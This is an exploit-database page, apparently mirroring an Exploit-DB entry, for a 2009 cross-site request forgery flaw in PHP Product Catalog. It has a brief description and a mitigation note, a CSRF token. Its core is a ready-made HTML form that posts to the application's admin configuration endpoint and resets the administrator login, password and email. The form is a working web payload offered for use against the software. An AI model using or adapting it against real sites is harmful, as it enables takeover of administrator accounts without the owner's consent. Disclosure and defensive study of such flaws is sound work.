header-logo
Suggest Exploit
vendor:
PHP Product Catalog
by:
bi0
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: PHP Product Catalog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP Product Catalog – [ CSRF ] Change Administrator Password

A Cross-Site Request Forgery (CSRF) vulnerability exists in the PHP Product Catalog application, which allows an attacker to change the administrator password. An attacker can craft a malicious HTML page containing a form with the necessary parameters to change the administrator password. When the administrator visits the malicious page, the form will be automatically submitted, and the administrator password will be changed.

Mitigation:

Implementing a CSRF token in the application can prevent this type of attack.
Source

Exploit-DB raw data:

                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] PHP Product Catalog - [ CSRF ] Change Administrator Password
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Thanks: Pig,packetdeath,redking,sp1r1t and all my friends
# [x] IRC : irc.clickshqip.com / #itsecurity
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#     [ Login ]
#     http://[server]/[path]/admin.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|

<html>
<form action="http://[server]/admin.php?p=otherConfig&amp;sOption=save" method="POST">
Admin : <input type="text" name="login" value="admin" size="5" /><br>
Passwd  <input type="text" name="pass" value="123" size="5" /><br>
Email : <input type="text" name="email" value="test@example.com" size="16" /><br>
<input type="submit" name="save" value="Save">
</form>
</html>

|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF

Navigation

Suggest Exploit

Services By CQR